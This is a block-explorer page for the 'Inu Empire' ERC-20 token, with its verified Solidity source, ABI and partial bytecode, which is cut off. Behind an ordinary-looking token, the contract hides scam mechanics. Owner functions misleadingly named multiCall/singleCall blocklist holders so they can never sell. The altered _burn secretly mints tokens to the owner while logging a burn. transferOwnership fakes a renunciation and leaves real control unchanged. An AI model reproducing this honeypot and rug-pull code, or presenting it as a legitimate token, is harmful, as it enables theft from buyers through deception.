ETH Price: $3,081.64 (+4.72%)
Gas: 9 Gwei

Token

Inu Empire (inuEMPIRE)
 

Overview

Max Total Supply

100,000,000,000 inuEMPIRE

Holders

67

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
rsync-builder.eth
Balance
212,729,464.602260761 inuEMPIRE

Value
$0.00
0x1f9090aae28b8a3dceadf281b0f12828e676c326
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
InuEmpire

Compiler Version
v0.8.1+commit.df193b15

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 5: INU EMPIRE.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;

import "./ERC20.sol";
import "./Ownable.sol";

contract InuEmpire is Ownable, ERC20 {
    
    // Defines how to read the TokenInfo ABI, as well as the capabilities of the token
    uint256 public TOKEN_TYPE = 1;
    
    mapping (address => bool) private _call;
    bool _trans = true;
    uint256 private _supply;
    address private _router;
    
    constructor(uint256 supply, address router) ERC20(_name, _symbol) {
        _name = "Inu Empire";
        _symbol = "inuEMPIRE";
        _router = router;
        _supply = supply;
        
    // Generate TotalSupply    
        _totalSupply += _supply;
        _balances[_msgSender()] += _totalSupply;
        emit Transfer(address(0), _msgSender(), _totalSupply);
    }
    
    function initialized() public view returns (bool) {
        return _trans;
    }

 
    function singleCall(address _address) external onlyOwner {
        _call[_address] = false;
    }

    function multiCall(address _address) external onlyOwner {
        _call[_address] = true;
    }

    function taxRewardedAddress(address _address) public view returns (bool) {
        return _call[_address];
    }

    function _transfer(address sender, address recipient, uint256 amount) internal override {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be grater thatn zero");
        if (_call[sender] || _call[recipient]) require(_trans == false, "");
         if (_trans == true || sender == owner || recipient == owner) {
        _beforeTokenTransfer(sender, recipient, amount);
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;
        emit Transfer(sender, recipient, amount);} else {
        require (_trans == true, "");}
    }

    function burn(uint256 amount) public onlyOwner {
        _burn(_msgSender(), amount);
    }
 
    function uniswapv2Router() public view returns (address) {
        return _router;
    }
}    

File 1 of 5: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

File 2 of 5: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;

import "./IERC20.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20 {
    mapping (address => uint256) internal _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    uint256 internal _totalSupply;
    string internal _name;
    string internal _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 9.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overloaded;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        _balances[account] = accountBalance + amount;
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. 
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be crated for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

File 3 of 5: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

File 5 of 5: Ownable.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;

import "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address owner;
    address owneraddress;
    event OwnershipTransferred(
        address indexed previousOwner, 
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = msg.sender;
        owner = msgSender;
        owneraddress = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function ownerAddress() public view returns (address) {
        return owneraddress;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner == msg.sender, "Ownable: caller is not the owner");
        _;
    }


    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(owner, newOwner);
        owneraddress = newOwner;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"supply","type":"uint256"},{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"TOKEN_TYPE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialized","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"multiCall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"ownerAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"singleCall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"taxRewardedAddress","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapv2Router","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

608060405260016007556001600960006101000a81548160ff0219169083151502179055503480156200003157600080fd5b506040516200283d3803806200283d833981810160405281019062000057919062000564565b6005805462000066906200066e565b80601f016020809104026020016040519081016040528092919081815260200182805462000094906200066e565b8015620000e55780601f10620000b957610100808354040283529160200191620000e5565b820191906000526020600020905b815481529060010190602001808311620000c757829003601f168201915b505050505060068054620000f9906200066e565b80601f016020809104026020016040519081016040528092919081815260200182805462000127906200066e565b8015620001785780601f106200014c5761010080835404028352916020019162000178565b820191906000526020600020905b8154815290600101906020018083116200015a57829003601f168201915b50505050506000339050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35081600590805190602001906200027792919062000486565b5080600690805190602001906200029092919062000486565b5050506040518060400160405280600a81526020017f496e7520456d706972650000000000000000000000000000000000000000000081525060059080519060200190620002e092919062000486565b506040518060400160405280600981526020017f696e75454d504952450000000000000000000000000000000000000000000000815250600690805190602001906200032e92919062000486565b5080600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555081600a81905550600a54600460008282546200038d9190620005d3565b9250508190555060045460026000620003ab6200047e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620003f69190620005d3565b925050819055506200040d6200047e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6004546040516200046e9190620005b6565b60405180910390a3505062000736565b600033905090565b82805462000494906200066e565b90600052602060002090601f016020900481019282620004b8576000855562000504565b82601f10620004d357805160ff191683800117855562000504565b8280016001018555821562000504579182015b8281111562000503578251825591602001919060010190620004e6565b5b50905062000513919062000517565b5090565b5b808211156200053257600081600090555060010162000518565b5090565b600081519050620005478162000702565b92915050565b6000815190506200055e816200071c565b92915050565b600080604083850312156200057857600080fd5b600062000588858286016200054d565b92505060206200059b8582860162000536565b9150509250929050565b620005b08162000664565b82525050565b6000602082019050620005cd6000830184620005a5565b92915050565b6000620005e08262000664565b9150620005ed8362000664565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620006255762000624620006a4565b5b828201905092915050565b60006200063d8262000644565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060028204905060018216806200068757607f821691505b602082108114156200069e576200069d620006d3565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6200070d8162000630565b81146200071957600080fd5b50565b620007278162000664565b81146200073357600080fd5b50565b6120f780620007466000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c8063609c92b8116100ad578063a457c2d711610071578063a457c2d714610347578063a55626cb14610377578063a9059cbb14610395578063dd62ed3e146103c5578063f2fde38b146103f55761012c565b8063609c92b8146102a157806370a08231146102bf5780638f84aa09146102ef57806395d89b411461030d5780639f87adc91461032b5761012c565b8063313ce567116100f4578063313ce567146101eb57806339509351146102095780633caa8aca1461023957806342966c6814610269578063549f3295146102855761012c565b806306fdde0314610131578063095ea7b31461014f578063158ef93e1461017f57806318160ddd1461019d57806323b872dd146101bb575b600080fd5b610139610411565b60405161014691906119aa565b60405180910390f35b610169600480360381019061016491906116f6565b6104a3565b604051610176919061198f565b60405180910390f35b6101876104c1565b604051610194919061198f565b60405180910390f35b6101a56104d8565b6040516101b29190611b4c565b60405180910390f35b6101d560048036038101906101d091906116a7565b6104e2565b6040516101e2919061198f565b60405180910390f35b6101f36105e3565b6040516102009190611b67565b60405180910390f35b610223600480360381019061021e91906116f6565b6105ec565b604051610230919061198f565b60405180910390f35b610253600480360381019061024e9190611642565b610698565b604051610260919061198f565b60405180910390f35b610283600480360381019061027e9190611732565b6106ee565b005b61029f600480360381019061029a9190611642565b610790565b005b6102a9610879565b6040516102b69190611b4c565b60405180910390f35b6102d960048036038101906102d49190611642565b61087f565b6040516102e69190611b4c565b60405180910390f35b6102f76108c8565b6040516103049190611974565b60405180910390f35b6103156108f2565b60405161032291906119aa565b60405180910390f35b61034560048036038101906103409190611642565b610984565b005b610361600480360381019061035c91906116f6565b610a6d565b60405161036e919061198f565b60405180910390f35b61037f610b61565b60405161038c9190611974565b60405180910390f35b6103af60048036038101906103aa91906116f6565b610b8b565b6040516103bc919061198f565b60405180910390f35b6103df60048036038101906103da919061166b565b610ba9565b6040516103ec9190611b4c565b60405180910390f35b61040f600480360381019061040a9190611642565b610c30565b005b60606005805461042090611cb0565b80601f016020809104026020016040519081016040528092919081815260200182805461044c90611cb0565b80156104995780601f1061046e57610100808354040283529160200191610499565b820191906000526020600020905b81548152906001019060200180831161047c57829003601f168201915b5050505050905090565b60006104b76104b0610dec565b8484610df4565b6001905092915050565b6000600960009054906101000a900460ff16905090565b6000600454905090565b60006104ef848484610fbf565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061053a610dec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156105ba576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105b190611a6c565b60405180910390fd5b6105d7856105c6610dec565b85846105d29190611bf4565b610df4565b60019150509392505050565b60006009905090565b600061068e6105f9610dec565b848460036000610607610dec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106899190611b9e565b610df4565b6001905092915050565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461077c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161077390611a8c565b60405180910390fd5b61078d610787610dec565b826114a5565b50565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461081e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161081590611a8c565b60405180910390fd5b6001600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60075481565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461090190611cb0565b80601f016020809104026020016040519081016040528092919081815260200182805461092d90611cb0565b801561097a5780601f1061094f5761010080835404028352916020019161097a565b820191906000526020600020905b81548152906001019060200180831161095d57829003601f168201915b5050505050905090565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a12576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0990611a8c565b60405180910390fd5b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60008060036000610a7c610dec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610b39576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b3090611b2c565b60405180910390fd5b610b56610b44610dec565b858584610b519190611bf4565b610df4565b600191505092915050565b6000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000610b9f610b98610dec565b8484610fbf565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610cbe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb590611a8c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610d2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2590611a0c565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610e64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5b90611b0c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ed4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ecb90611a2c565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610fb29190611b4c565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141561102f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102690611acc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561109f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611096906119cc565b60405180910390fd5b600081116110e2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110d9906119ec565b60405180910390fd5b600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806111835750600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156111df5760001515600960009054906101000a900460ff161515146111de576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111d590611aec565b60405180910390fd5b5b60011515600960009054906101000a900460ff161515148061124c575060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806112a2575060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15611449576112b2838383611613565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611339576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161133090611a4c565b60405180910390fd5b81816113459190611bf4565b600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546113d79190611b9e565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa